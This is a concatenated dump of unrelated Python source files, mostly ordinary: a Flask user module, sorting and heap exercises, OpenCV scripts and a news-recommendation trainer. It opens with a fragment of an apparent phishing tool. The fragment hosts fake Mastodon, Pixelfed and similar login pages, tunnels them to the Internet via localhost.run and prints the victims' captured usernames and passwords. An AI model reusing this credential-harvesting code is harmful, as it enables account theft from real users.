selected='Hubzilla'
elif ch=='4':
selected='Mastodon'
elif ch=='5':
selected='Pixelfed'
elif ch=='6':
selected='Socialhome'
elif ch=='99':
exit()
return selected
def start_server(port,selected):
move_files(selected)
os.system('clear')
banner()
col_selected(selected)
col_info('Starting php server [localhost:'+port+']...','')
bg_cmd('php -S localhost:'+port+' -t ./server',shell=True,stderr=DEVNULL,stdout=DEVNULL)
print('\33[92m'+' done'+'\33[0m')
col_info('Exposing localhost:'+port+' to the Internet...','')
print(end='',flush=True)
bg_cmd('sh -c "ssh -o StrictHostKeyChecking=no -R 80:localhost:'+port+' [email protected] 2>/dev/null 1> link" &',shell=True,stderr=DEVNULL,stdout=DEVNULL)
time.sleep(8)
print('\33[92m'+' done'+'\33[0m')
link = bg_cmd_output('grep -o "https://[0-9a-z]*\.localhost.run" link')
link_text=f'Link: {link}'
col_info(link_text)
col_info('Waiting for target to login')
def get_creds():
col_info('Credentials found')
user = bg_cmd_output('cat ./server/creds.txt | head -1')
passwd = bg_cmd_output('cat ./server/creds.txt | tail -1')
print(f'[Username] : {user}\n[Password] : {passwd}')
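
# Hedged usage note (added commentary): these helpers are presumably driven by the
# project's entry script in roughly this order:
#   intro() -> startup() -> web_list() -> start_server(port, selected)
#   -> get_creds() -> stop_services()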
``` |
{
"source": "1337xp/OpenSourceBot",
"score": 3
} |
#### File: OpenSourceBot/utilities/default.py
```python
import random
import json
def config(filename: str = "configuration"):
""" Get default configuration file """
try:
with open(f"{filename}.json", encoding='utf8') as data:
return json.load(data)
except FileNotFoundError:
raise FileNotFoundError("Could not find JSON file.")
def random_colour():
return random.randint(0, 0xffffff)
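
# Hedged usage sketch (added for illustration; not part of the original file).
if __name__ == "__main__":
    # settings = config()          # requires a configuration.json next to the script
    print(hex(random_colour()))    # e.g. 0x3fa2c1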
``` |
{
"source": "13460991260/shop",
"score": 2
} |
#### File: info/news/user.py
```python
from flask import Blueprint,render_template,jsonify,g,session,make_response,request,redirect,url_for
from utils.captcha.captcha import captcha
from models import *
from werkzeug.security import generate_password_hash,check_password_hash
from utils.comm import isLogin
from utils.constand import admin_news_count
from apps import photos
user_blue = Blueprint('user',__name__)
#Display the home page
@user_blue.route("/get_image")
def get_image():
name,text,image_url = captcha.generate_captcha()
session['image_code'] = text.upper()
response = make_response(image_url)
response.headers['Content-Type'] = 'image/jpg'
return response
@user_blue.route("/index")
def index():
return render_template('news/text.html')
#Register a user
@user_blue.route("/register",methods=['post'])
def register():
print(request.form)
mes={}
mobile = request.form.get('mobile',0)
password = request.form.get('password','')
sms_code = request.form.get('sms_code','')
try:
agree = int(request.form.get('agree'))
except:
agree = 2
print(mobile+"##"+password+"##"+sms_code+"##"+str(agree))
if not all([mobile,password,sms_code,agree]):
mes['code'] = 10010
mes['message'] = '参数不完整'
else:
        #Check whether the user agreed to the terms
if agree == 1:
            #Check whether the image captcha is correct
imagecode = session.get('image_code')
if imagecode.upper() != sms_code.upper():
mes['code'] = 10040
mes['message'] = '验证码不匹配'
else:
password = generate_password_hash(password)
user = User(nick_name=mobile,password_hash=password,mobile=mobile)
print(user)
db.session.add(user)
session['username'] = mobile
mes['code'] = 200
mes['message'] = '验证成功'
else:
mes['code'] = 10020
mes['message'] = "必须同意"
return jsonify(mes)
#Show the user center
@user_blue.route("/user_info")
@isLogin
def user_info():
user = g.user
data = {'user_info':user}
return render_template('news/user.html',data=data)
#Login
@user_blue.route("/login",methods=["post",'get'])
def login():
mes = {}
if request.method == "POST":
username = request.form.get('mobile')
password = request.form.get('password')
print(username)
print(password)
if not all([username,password]):
mes['code'] = 10010
mes['message'] = '用户密码不能为空'
else:
user = User.query.filter(User.mobile==username).first()
if not user:
mes['code'] = 10011
mes['message'] = '用户不存在'
else:
flag = check_password_hash(user.password_hash,password)
if flag:
session['username'] = username
session['user_id'] = user.id
mes['code'] = 200
mes['message'] = '登录成功'
else:
mes['code'] = 10020
mes['message'] = '用户或密码错误'
return jsonify(mes)
#Log out
@user_blue.route("/logout")
def logout():
mes={}
session.pop('username',None)
mes['code'] = 200
return redirect("/")
#Show the change-password page
@user_blue.route('/pass_info',methods=['post','get'])
def pass_innfo():
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
if request.method == "POST":
mes = {}
old_password = request.form.get('old_password')
new_password = request.form.get('new_password')
new_password2 = request.form.get('<PASSWORD>')
if new_password != <PASSWORD>:
mes['code'] = 10010
mes['message'] = '两次密码输入不一致'
return jsonify(mes)
else:
user=User.query.filter(User.id==user.id).first()
password=user.password_hash
if not check_password_hash(password,old_password):
mes['code']=10520
mes['message']="老密码输入不正确"
else:
User.query.filter(User.id==user.id).update({'password_hash':generate_password_hash(new_password2)})
mes['code']= 200
mes['message']= '修改成功'
return jsonify(mes)
return render_template('news/user_pass_info.html')
#Show the edit-profile page
@user_blue.route("/base_info",methods=['post','get'])
@isLogin
def base_info():
user = g.user
if request.method == 'POST':
signature = request.form.get("signature")
nick_name = request.form.get("nick_name")
gender = request.form.get("gender")
joy = request.form.get("joy")
language = request.form.get("language")
user.nick_name = nick_name
user.signature = signature
user.gender=gender
user.joy = joy
user.language = int(language)
db.session.add(user)
jlist = []
if user.joy:
jlist = [int(i) for i in user.joy.split(",")]
joylist = [{'id':1,'name':'唱歌'},{'id':2,'name':'跳舞'},{'id':3,'name':'看书'}]
data = {'user_info':user,'joylist':joylist,'jlist':jlist}
# print(data)
return render_template("news/user_base_info.html",data=data)
#Upload avatar
@user_blue.route("/pic_info",methods=['post','get'])
def pic_info():
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
if request.method == "POST":
image = request.files['avatar']
file_name = photos.save(image)
            #Update the database
user.avatar_url = "/static/upload/"+file_name
db.session.add(user)
data = {'user_info':user}
return render_template("/news/user_pic_info.html",data=data)
# Publish news
@user_blue.route("/news_release",methods=['post','get'])
@isLogin
def news_release():
userid = g.user.id
if request.method == "POST":
data = request.form
title = data.get('title','')
category_id = data.get('category_id',0)
digest = data.get('digest','')
content = data.get('content','')
image = request.files['index_image']
image_url = ""
if image:
image_name = photos.save(image)
image_url = "static/upload/"+image_name
news = News(name=title,cid=category_id,content=content,image_url=image_url,descrp=digest,is_exam=0,reason='',user_id=userid)
db.session.add(news)
return redirect(url_for('user.news_list'))
cate = News_type.query.all()
data = {'cate':cate}
return render_template("news/user_news_release.html",data=data)
#News list
@user_blue.route("/news_list")
@isLogin
def news_list():
user = g.user
current_page = 1
try:
page = int(request.args.get('page',0))
except:
page = 0
    #Pagination
if page>0:
current_page = page
page_count = admin_news_count
news_list = News.query.paginate(current_page,page_count,False)
data = {'news_list':news_list.items,'current_page':news_list.page,'total_page':news_list.pages}
return render_template('news/user_news_list.html',data=data)
#Image upload
@user_blue.route("/upload_img")
def upload_img():
image = request.files['file']
file_name = photos.save(image)
mes = {}
mes['path'] = "/static/upload/"+file_name
mes['error'] = False
return jsonify(mes)
#My collections
@user_blue.route("/collection")
@isLogin
def collection():
user = g.user
current_page= request.args.get('p',1)
page_count = 1
collect = user.user_collect.paginate(int(current_page),page_count,False)
data = {'news_list':collect.items,'current_page':collect.page,
'total_page':collect.pages}
return render_template("/news/user_collection.html",data=data)
```
#### File: shop/utils/comm.py
```python
from flask import session,redirect,url_for,g
from models import User
from functools import wraps
#Decorator that checks login status and fetches the user info
def isLogin(func):
@wraps(func)
def wrapper(*args,**kwargs):
username = session.get("username")
if not username:
return redirect(url_for('news.index'))
else:
user = User.query.filter(User.mobile == username).first()
g.user=user
return func(*args,**kwargs)
return wrapper
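
# Hedged usage note (added commentary): the decorator wraps Flask view functions,
# e.g. in info/news/user.py above:
#
#     @user_blue.route("/user_info")
#     @isLogin
#     def user_info():
#         user = g.user
#         ...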
``` |
{
"source": "13472889991/DataStructures-Algorithms",
"score": 4
} |
#### File: 13472889991/DataStructures-Algorithms/Heap.py
```python
class Heap():
def __init__(self, lst):
self.lst = lst
def __str__(self):
return str(self.lst)
# Returns left child index of node, runs in 0(1) time.Returns none if D.N.E
def left(self, index):
index += 1
if 2 * index >= len(self.lst) + 1:
return None
return (2 * index - 1)
# Returns right child index of node, runs in 0(1) time.Returns none if
# D.N.E
def right(self, index):
index += 1
if 2 * (index) >= len(self.lst):
return None
return (2 * index)
# Returns parent index of the node, runs in 0(1) time.Returns none if D.N.E
def parent(self, index):
if index == 0:
return None
index += 1
return (index // 2 - 1)
# Given a key, finds index of key. Runs in 0(n) time, where N is the size of Heap
# Returns none if D.N.E
def find(self, key):
for counter, value in enumerate(self.lst):
if key == value:
return counter
return None
# appends a key to the end of the heap
def append(self, key):
self.lst.append(key)
    # Changes the value at a given index to a new key.
    def change(self, index, key):
        if index < len(self.lst):
            self.lst[index] = key
    # Max_Heapify "fixes" the max heap at the index by swapping it with the
    # largest of its children, then keeps sifting down so the heap property holds.
    def max_heapify(self, index):
        largest = index
        l = self.left(index)
        r = self.right(index)
        if(l != None and self.lst[index] < self.lst[l]):
            largest = l
        if(r != None and self.lst[largest] < self.lst[r]):
            largest = r
        if largest != index:
            temp = self.lst[largest]
            self.lst[largest] = self.lst[index]
            self.lst[index] = temp
            self.max_heapify(largest)
def extract_max(self):
self.lst[0], self.lst[len(self.lst)-1] = self.lst[len(self.lst)-1],self.lst[0]
output = self.lst.pop()
self.build_max_heap()
return output
    # build_max_heap turns the list into a max heap, sifting down from the last
    # internal node back to the root.
    def build_max_heap(self):
        size = len(self.lst)
        for i in range(size // 2 - 1, -1, -1):
            self.max_heapify(i)
def heap_sort(self):
for i in range (len(self.lst)):
print(self.extract_max())
self.build_max_heap()
    def min_heapify(self, index):
        smallest = index
        l = self.left(index)
        r = self.right(index)
        if (l != None and self.lst[index] > self.lst[l]):
            smallest = l
        if (r != None and self.lst[smallest] > self.lst[r]):
            smallest = r
        if smallest != index:
            temp = self.lst[smallest]
            self.lst[smallest] = self.lst[index]
            self.lst[index] = temp
            self.min_heapify(smallest)
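
# Hedged usage sketch (added for illustration; not part of the original file).
if __name__ == "__main__":
    h = Heap([4, 10, 3, 5, 1])
    h.build_max_heap()       # e.g. [10, 5, 3, 4, 1]
    print(h)
    print(h.extract_max())   # 10
    print(h.extract_max())   # 5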
```
#### File: 13472889991/DataStructures-Algorithms/Karp-Rabin.py
```python
class RollingHash():
def __init__(self, string=""):
self.string = list(string)
self.hash = sum([ord(i) for i in string])
def remove(self, char):
self.hash -= ord(char)
self.string.pop(0)
def add(self, char):
self.hash += ord(char)
self.string.append(char)
def __str__(self):
return str(self.hash)
def karprabin(target, text):
hash1=RollingHash(target)
hash2=RollingHash(text[0:len(target)])
if hash1.hash == hash2.hash:
if hash1.string == hash2.string:
return True
for i in range(len(target),len(text)):
hash2.remove(hash2.string[0])
hash2.add(text[i])
print(hash1,hash2)
if hash1.hash == hash2.hash:
if hash1.string == hash2.string:
return True
return False
print(karprabin("Hello", "Hello World"))
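# Note (added commentary): RollingHash is a simple additive hash (sum of character
# ordinals), so unrelated windows can collide; karprabin() therefore re-checks
# hash1.string == hash2.string before reporting a match.
# Another hedged example call, assuming the same API:
# print(karprabin("World", "Hello World"))   # expected: True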
```
#### File: 13472889991/DataStructures-Algorithms/Sort.py
```python
# Insertion Sort that runs in θ(n^2) time
# TODO: implement the insertion point lookup with binary search, O(n*lg(n)) comparisons
def insertionSort(lst):
    for i in range(1, len(lst)):
        key = lst[i]
        # Swap key backwards until it reaches its sorted position
        # (z runs from 1 to i so that index 0 is also compared).
        for z in range(1, i + 1):
            if key < lst[i - z]:
                temp = lst[i - z]
                lst[i - z] = key
                lst[i - z + 1] = temp
    return lst
# Merge sort that runs in O(n(lg(n))) time
def mergeSort(lst):
if (len(lst) == 1):
return lst
return merge(mergeSort(lst[0:len(lst) // 2]),
mergeSort(lst[len(lst) // 2:]))
def merge(lst, lst2):
# individual list counters
j = 0
k = 0
output = []
# Append inf to end of arrays to make it easier
lst.append(float("inf"))
lst2.append(float("inf"))
for i in range(len(lst) + len(lst2)):
if lst[j] < lst2[k]:
output.append(lst[j])
j += 1
elif lst2[k] < lst[j]:
output.append(lst2[k])
k += 1
elif lst2[k] == lst[j] and lst2[k] != float("inf"):
output.append(lst2[k])
k += 1
return output
def countingSort(lst, maximum = 0):
sort = []
if maximum == 0:
for i in lst:
if maximum < i:
maximum = i
output=[0 for i in range(maximum + 1)]
for i in lst:
output[i]+=1
for counter, value in enumerate(output):
for i in range(value):
sort.append(counter)
return sort
def selectionSort(lst):
output=[]
for i in range(len(lst)):
minimum=lst[0]
for j in (lst):
if minimum > j:
minimum = j
lst.remove(minimum)
output.append(minimum)
return output
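
# Hedged usage sketch (added for illustration; not part of the original file).
if __name__ == "__main__":
    sample = [5, 2, 9, 1, 5, 6]
    print(insertionSort(list(sample)))   # [1, 2, 5, 5, 6, 9]
    print(mergeSort(list(sample)))       # [1, 2, 5, 5, 6, 9]
    print(countingSort(list(sample)))    # [1, 2, 5, 5, 6, 9]
    print(selectionSort(list(sample)))   # [1, 2, 5, 5, 6, 9]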
``` |
{
"source": "13488151126/mobilenet-yolov4-lite-tf2-main",
"score": 3
} |
#### File: mobilenet-yolov4-lite-tf2-main/img/mask.py
```python
import cv2
import imutils
import numpy as np
import os
def cv_show(name):
cv2.imshow('name', name)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Unified mouse callback function
def draw_roi(img):
    pts = [(356, 130), (669, 576), (704, 576), (704, 130), (356, 130)] # stores the polygon points
mask = np.zeros(img.shape, np.uint8)
points = np.array(pts, np.int32)
points = points.reshape((-1, 1, 2))
    # Draw the polygon
mask = cv2.polylines(mask, [points], True, (255, 255, 255), 2)
    mask2 = cv2.fillPoly(mask.copy(), [points], (255, 255, 255)) # used to extract the ROI
    mask3 = cv2.fillPoly(mask.copy(), [points], (0, 255, 0)) # used for the on-screen preview image
show_image = cv2.addWeighted(src1=img, alpha=0.8, src2=mask3, beta=0.2, gamma=0)
# cv_show(show_image)
ROI = cv2.bitwise_and(mask2, img)
# res = np.hstack(show_image,ROI)
# cv_show(ROI)
# cv2.imshow("res", res)
# cv2.waitKey(0)
return show_image, ROI
# Create the image and window and bind the window to the callback function
# img = cv2.imread("ori/1618309544.1371417.jpg")
# draw_roi(img)
img_path = 'ori'
dir_path = 'JPGImages'
for files in os.walk(img_path):
for file in files[2]:
fileimgpath = img_path + '\\' + file
img = cv2.imread(fileimgpath)
cv2.imwrite(fileimgpath,img)
show, roi = draw_roi(img)
savepath = dir_path + '\\' + file
cv2.imwrite(savepath, roi)
```
#### File: mobilenet-yolov4-lite-tf2-main/img/xdl33video.py
```python
import cv2
import time
# Camera parameter setup
def Setcamera(cap):
cap.set(6, cv2.VideoWriter.fourcc('M', 'J', 'P', 'G'))
cap.set(3, 480)
cap.set(4, 640)
if __name__ == '__main__':
fps = 0.0
# cv2.namedWindow("camera", 1)
    # Open the IP camera stream
video = "rtsp://admin:[email protected]/h264/ch1/sub/av_stream"
capture = cv2.VideoCapture(video)
Setcamera(capture)
c = 1
frameRate = 20
num = 0
while True:
ref, frame = capture.read()
if ref:
cv2.imshow("video", frame)
t = 'ori\\' + str(time.time()).split('.', 1)[0]
q = cv2.waitKey(10) & 0xff
if q == ord('q'):
capture.release()
break
elif q == ord('w'):
print(t)
cv2.imwrite(t + '.jpg', frame)
# del ref,frame
# cv2.destroyWindow("camera")
# if __name__ == '__main__':
# fps = 0.0
# cv2.namedWindow("camera", 1)
# # Open the IP camera stream
# video = "http://admin:[email protected]:8081/"
# capture = cv2.VideoCapture(video)
# Setcamera(capture)
# c = 1
# frameRate = 20
# num = 0
# while True:
# t1 = time.time()
#
# ref, frame = capture.read()
#
#
# fps = (fps + (1. / (time.time() - t1))) / 2
# print("fps= %.2f" % fps)
# frame = cv2.putText(frame, "fps= %.2f" % (fps), (0, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
#
# cv2.imshow("video", frame)
# print((time.time() - t1))
# c = cv2.waitKey(30) & 0xff
# if c == ord('q'):
# capture.release()
# break
#
# cv2.destroyWindow("camera")
``` |
{
"source": "13520505/bigdataproj",
"score": 2
} |
#### File: acr_module/acr/acr_trainer_cafebiz.py
```python
import logging
import os
from time import time
import json
import tempfile
import tensorflow as tf
import numpy as np
import pandas as pd
from random import shuffle
from sklearn.preprocessing import StandardScaler
import sys
# sys.path.append("/data1/tungtv/code/chameleon/newsrecomdeepneural")
from acr_module.acr.acr_module_service import get_all_file, split_date, load_json_config
from acr_module.acr.utils import resolve_files, deserialize, serialize, log_elapsed_time
from acr_module.acr.acr_model import ACR_Model
from acr_module.acr.acr_datasets import prepare_dataset
import os.path
from os import path
import mysql.connector
import pickle
import operator
from tensorflow.contrib import predictor
from nar_module.nar.preprocessing.nar_preprocess_cafebiz_2 import delete_all_file_in_path
tf.logging.set_verbosity(tf.logging.INFO)
RANDOM_SEED=42
#Control params
#tf.flags.DEFINE_string('data_dir', default='',
# help='Directory where the dataset is located')
tf.flags.DEFINE_string('train_set_path_regex',
default='/train*.tfrecord', help='Train set regex')
tf.flags.DEFINE_string('model_dir', default='./tmp',
help='Directory where save model checkpoints')
tf.flags.DEFINE_string('input_word_vocab_embeddings_path', default='',
help='Input path for a pickle with words vocabulary and corresponding word embeddings')
tf.flags.DEFINE_string('input_label_encoders_path', default='',
help='Input path for a pickle with label encoders (article_id, category_id, publisher_id)')
tf.flags.DEFINE_string('output_acr_metadata_embeddings_path', default='',
help='Output path for a pickle with articles metadata and content embeddings')
#Model params
tf.flags.DEFINE_string('text_feature_extractor', default="CNN", help='Feature extractor of articles text: CNN or RNN')
tf.flags.DEFINE_string('training_task', default="metadata_classification", help='Training task: (metadata_classification | autoencoder)')
tf.flags.DEFINE_float('autoencoder_noise', default=0.0, help='Adds white noise with this standard deviation to the input word embeddings')
tf.flags.DEFINE_string('cnn_filter_sizes', default="3,4,5", help='CNN layers filter sizes (sliding window over words)')
tf.flags.DEFINE_integer('cnn_num_filters', default=128, help='Number of filters of CNN layers')
tf.flags.DEFINE_integer('rnn_units', default=250, help='Number of units in each RNN layer')
tf.flags.DEFINE_integer('rnn_layers', default=1, help='Number of RNN layers')
tf.flags.DEFINE_string('rnn_direction', default='unidirectional', help='Direction of RNN layers: (unidirectional | bidirectional)')
tf.flags.DEFINE_integer('acr_embeddings_size', default=250, help='Embedding size of output ACR embeddings')
#Training params
tf.flags.DEFINE_integer('batch_size', default=64, help='Batch size')
tf.flags.DEFINE_integer('training_epochs', default=10, help='Training epochs')
tf.flags.DEFINE_float('learning_rate', default=1e-3, help='Learning rate')
tf.flags.DEFINE_float('dropout_keep_prob', default=1.0, help='Dropout (keep prob.)')
tf.flags.DEFINE_float('l2_reg_lambda', default=1e-3, help='L2 regularization')
FLAGS = tf.flags.FLAGS
#params_dict = tf.app.flags.FLAGS.flag_values_dict()
#tf.logging.info('PARAMS: {}'.format(json.dumps(params_dict)))
def get_session_features_config(acr_label_encoders):
features_config = {
'single_features':
{'article_id': {'type': 'categorical', 'dtype': 'int'},
'category0': {'type': 'categorical', 'dtype': 'int'},
# 'category1': {'type': 'categorical', 'dtype': 'int'},
# 'author': {'type': 'categorical', 'dtype': 'int'},
'created_at_ts': {'type': 'numerical', 'dtype': 'int'},
'text_length': {'type': 'numerical', 'dtype': 'int'},
},
'sequence_features': {
'text': {'type': 'numerical', 'dtype': 'int'},
'keywords': {'type': 'categorical', 'dtype': 'int'},
# 'concepts': {'type': 'categorical', 'dtype': 'int'},
# 'entities': {'type': 'categorical', 'dtype': 'int'},
'locations': {'type': 'categorical', 'dtype': 'int'},
'persons': {'type': 'categorical', 'dtype': 'int'},
},
'label_features': {
'category0': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multiclass', 'feature_weight_on_loss': 1.0},
## 'category1': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multiclass'}, #Too unbalanced
'keywords': {'type': 'categorical', 'dtype': 'int', 'classification_type': 'multilabel', 'feature_weight_on_loss': 1.0},
}
}
#Adding cardinality to categorical features
for feature_groups_key in features_config:
features_group_config = features_config[feature_groups_key]
for feature_name in features_group_config:
if feature_name in acr_label_encoders and features_group_config[feature_name]['type'] == 'categorical':
features_group_config[feature_name]['cardinality'] = len(acr_label_encoders[feature_name])
tf.logging.info('Session Features: {}'.format(features_config))
return features_config
def load_acr_preprocessing_assets(acr_label_encoders_path, word_vocab_embeddings_path):
(acr_label_encoders, labels_class_weights) = deserialize(acr_label_encoders_path)
article_id_encoder = acr_label_encoders['article_id']
tf.logging.info("Read article id label encoder: {}".format(len(acr_label_encoders['article_id'])))
tf.logging.info("Classes weights available for: {}".format(labels_class_weights.keys()))
(word_vocab, word_embeddings_matrix) = deserialize(word_vocab_embeddings_path)
tf.logging.info("Read word embeddings: {}".format(word_embeddings_matrix.shape))
return acr_label_encoders, labels_class_weights, word_embeddings_matrix
def create_multihot_feature(features, column_name, features_config):
column = tf.feature_column.indicator_column(tf.feature_column.categorical_column_with_identity(
key=column_name, num_buckets=features_config['sequence_features'][column_name]['cardinality']))
return column
PREDICTIONS_PREFIX = "predictions-"
def acr_model_fn(features, labels, mode, params):
#keywords_column = create_multihot_feature(features, 'keywords', params['features_config'])
# concepts_column = create_multihot_feature(features, 'concepts', params['features_config'])
# entities_column = create_multihot_feature(features, 'entities', params['features_config'])
locations_column = create_multihot_feature(features, 'locations', params['features_config'])
persons_column = create_multihot_feature(features, 'persons', params['features_config'])
# metadata_input_feature_columns = [concepts_column, entities_column, locations_column, persons_column]
metadata_input_feature_columns = [locations_column, persons_column]
metadata_input_features = {#'concepts': features['concepts'],
# 'entities': features['entities'],
'locations': features['locations'],
'persons': features['persons']}
acr_model = ACR_Model(params['training_task'], params['text_feature_extractor'], features, metadata_input_features,
metadata_input_feature_columns,
labels, params['features_config']['label_features'],
mode, params)
loss = None
if (mode == tf.estimator.ModeKeys.TRAIN or
mode == tf.estimator.ModeKeys.EVAL):
loss = acr_model.total_loss
train_op = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = acr_model.train_op
eval_metrics = {}
if (mode == tf.estimator.ModeKeys.TRAIN or
mode == tf.estimator.ModeKeys.EVAL):
eval_metrics = acr_model.eval_metrics
predictions = None
prediction_hooks = None
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {#Category prediction
#'predicted_category_id': acr_model.predictions,
#Trained ACR embeddings
'acr_embedding': acr_model.article_content_embedding,
#Additional metadata
'article_id': features['article_id'],
'category0': features['category0'],
# 'category1': features['category1'],
# 'author': features['author'],
'keywords': features['keywords'],
# 'concepts': features['concepts'],
# 'entities': features['entities'],
'locations': features['locations'],
'persons': features['persons'],
'created_at_ts': features['created_at_ts'],
'text_length': features['text_length'],
'input_text': features['text']
}
if params['training_task'] == 'autoencoder':
#predictions['input_text'] = features['text']
predictions['predicted_word_ids'] = acr_model.predicted_word_ids
elif params['training_task'] == 'metadata_classification':
#Saves predicted categories
for feature_name in acr_model.labels_predictions:
predictions["{}{}".format(PREDICTIONS_PREFIX, feature_name)] = acr_model.labels_predictions[feature_name]
#prediction_hooks = [ACREmbeddingExtractorHook(mode, acr_model)]
training_hooks = []
if params['enable_profiler_hook']:
profile_hook = tf.train.ProfilerHook(save_steps=100,
save_secs=None,
show_dataflow=True,
show_memory=False)
training_hooks=[profile_hook]
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metrics,
training_hooks=training_hooks
#prediction_hooks=prediction_hooks,
)
def build_acr_estimator(model_output_dir, word_embeddings_matrix, features_config, labels_class_weights, special_token_embedding_vector, list_args):
params = {'training_task': list_args["training_task"],
'text_feature_extractor': list_args["text_feature_extractor"],
'word_embeddings_matrix': word_embeddings_matrix,
'vocab_size': word_embeddings_matrix.shape[0],
'word_embedding_size': word_embeddings_matrix.shape[1],
'cnn_filter_sizes': list_args["cnn_filter_sizes"],
'cnn_num_filters': list_args["cnn_num_filters"],
'rnn_units': list_args["rnn_units"],
'rnn_layers': list_args["rnn_layers"],
'rnn_direction': list_args["rnn_direction"],
'dropout_keep_prob': list_args["dropout_keep_prob"],
'l2_reg_lambda': list_args["l2_reg_lambda"],
'learning_rate': list_args["learning_rate"],
'acr_embeddings_size': list_args["acr_embeddings_size"],
'features_config': features_config,
'labels_class_weights': labels_class_weights,
'special_token_embedding_vector': special_token_embedding_vector,
'autoencoder_noise': list_args["autoencoder_noise"],
'enable_profiler_hook': False
}
session_config = tf.ConfigProto(allow_soft_placement=True)
run_config = tf.estimator.RunConfig(tf_random_seed=RANDOM_SEED,
save_summary_steps=50,
keep_checkpoint_max=1,
session_config=session_config
)
acr_cnn_classifier = tf.estimator.Estimator(model_fn=acr_model_fn,
model_dir=model_output_dir,
params=params,
config=run_config)
return acr_cnn_classifier
def export_acr_metadata_embeddings(acr_label_encoders, articles_metadata_df, content_article_embeddings):
output_path = FLAGS.output_acr_metadata_embeddings_path
tf.logging.info('Exporting ACR Label Encoders, Article metadata and embeddings to {}'.format(output_path))
to_serialize = (acr_label_encoders, articles_metadata_df, content_article_embeddings)
serialize(output_path, to_serialize)
def get_articles_metadata_embeddings(article_metadata_with_pred_embeddings):
articles_metadata_df = pd.DataFrame(article_metadata_with_pred_embeddings).sort_values(by='article_id')
tf.logging.info("First article id: {}".format(articles_metadata_df['article_id'].head(1).values[0]))
tf.logging.info("Last article id: {}".format(articles_metadata_df['article_id'].tail(1).values[0]))
#Checking whether article ids are sorted and contiguous
# assert (articles_metadata_df['article_id'].head(1).values[0] == 1) #0 is reserved for padding
# assert (len(articles_metadata_df) == articles_metadata_df['article_id'].tail(1).values[0])
content_article_embeddings = np.vstack(articles_metadata_df['acr_embedding'].values)
# #Standardizing the Article Content Embeddings for Adressa dataset, and scaling to get maximum and minimum values around [-6,5], instead of [-40,30] after standardization, to mimic the doc2vec distribution for higher accuracy in NAR module
# scaler = StandardScaler()
# content_article_embeddings_standardized = scaler.fit_transform(content_article_embeddings)
# content_article_embeddings_standardized_scaled = content_article_embeddings_standardized / 5.0
#
#
#Creating and embedding for the padding article
embedding_for_padding_article = np.mean(content_article_embeddings, axis=0)
content_article_embeddings_with_padding = np.vstack([embedding_for_padding_article, content_article_embeddings])
#Checking if content articles embedding size correspond to the last article_id
# assert content_article_embeddings_with_padding.shape[0] == articles_metadata_df['article_id'].tail(1).values[0]+1
#Converting keywords multi-label feature from multi-hot representation back to list of keyword ids
preds_keywords_column_name = "{}{}".format(PREDICTIONS_PREFIX, "keywords")
if preds_keywords_column_name in articles_metadata_df.columns:
articles_metadata_df[preds_keywords_column_name] = articles_metadata_df[preds_keywords_column_name] \
.apply(lambda x: x.nonzero()[0])
# cols_to_export = ['article_id', 'category0', 'category1',
# 'author', 'keywords', 'concepts', 'entities', 'locations', 'persons',
# 'created_at_ts', 'text_length', 'input_text']
cols_to_export = ['article_id', 'category0', 'keywords', 'locations', 'persons',
'created_at_ts', 'text_length', 'input_text']
if FLAGS.training_task == 'autoencoder':
cols_to_export.extend(['predicted_word_ids'])
elif FLAGS.training_task == 'metadata_classification':
#Adding predictions columns for debug
cols_to_export.extend([col for col in articles_metadata_df.columns if col.startswith(PREDICTIONS_PREFIX)])
#Filtering metadata columns to export
# articles_metadata_df = articles_metadata_df[['article_id', 'category0', 'category1',
# 'author', 'keywords', 'concepts', 'entities', 'locations', 'persons',
# 'created_at_ts', 'text_length'] + \
# list([column_name for column_name in articles_metadata_df.columns \
# if column_name.startswith(PREDICTIONS_PREFIX)])] #Adding predictions columns for debug
# articles_metadata_df = articles_metadata_df[['article_id', 'category0', 'keywords', 'locations', 'persons',
# 'created_at_ts', 'text_length'] + \
# list([column_name for column_name in articles_metadata_df.columns \
# if column_name.startswith(
# PREDICTIONS_PREFIX)])] # Adding predictions columns for debug
articles_metadata_df = articles_metadata_df[cols_to_export]
return articles_metadata_df, content_article_embeddings_with_padding
def Merge(dict1, dict2):
return(dict2.update(dict1))
def export_acr_metadata_embeddings_with_datetime(df, acr_label_encoders, articles_metadata_df, content_article_embeddings, path):
# if os.path.exists('./acr_module/config/dict_news_id_encode.pickle'):
# pickle_in = open("./acr_module/config/dict_news_id_encode.pickle", "rb")
# dict_id_old = pickle.load(pickle_in)
#
# list_key_old = list(dict_id_old.keys())
# list_value_old = list(dict_id_old.values())
#
# dict_id_new = acr_label_encoders['article_id']
# list_key_new = list(dict_id_new.keys())
# list_value_new = list(dict_id_new.values())
#
# list_key_old = list_key_old.append(list_key_new)
# list_value_old = list_value_old.append(list_value_new)
#
# acr_label_encoders['article_id'] = dict(zip(list_key_old, list_value_old ))
#
# # Merge(dict_id_old, dict_id_new)
# #
# # acr_label_encoders['article_id'] = dict_id_new
# # acr_label_encoders['article_id'] = sorted(dict_id_new.items(), key=operator.itemgetter(1))
# # acr_label_encoders['article_id'] = dict(acr_label_encoders['article_id'])
if len(os.listdir( path)) != 0 :
(acr_label_encoders_load, articles_metadata_df_load, content_article_embeddings_load) = deserialize((get_all_file( path))[0])
# append article_id
list_key_old = list(df['id'])
list_key_old.insert(0, "<PAD>")
list_value_old = list(df['id_encoded'])
list_value_old.insert(0, 0)
# list_value_old = list(acr_label_encoders_load['article_id'].values())
# list_key_old.extend(list(acr_label_encoders['article_id'].keys()))
# list_value_old.extend(list(acr_label_encoders['article_id'].values()))
#
# print("new and old acr_label_encoders = >>>>>>>>>>")
# print(len(list(acr_label_encoders['article_id'].keys())))
# print(len(list(acr_label_encoders['article_id'].values())))
#
# print(len(list_key_old))
# print(len(list_value_old))
acr_label_encoders['article_id'] = dict(zip(list_key_old, list_value_old))
print(len(acr_label_encoders['article_id'].keys()))
print(len(acr_label_encoders['article_id'].values()))
# append df
print("load : {}".format(len(articles_metadata_df_load)))
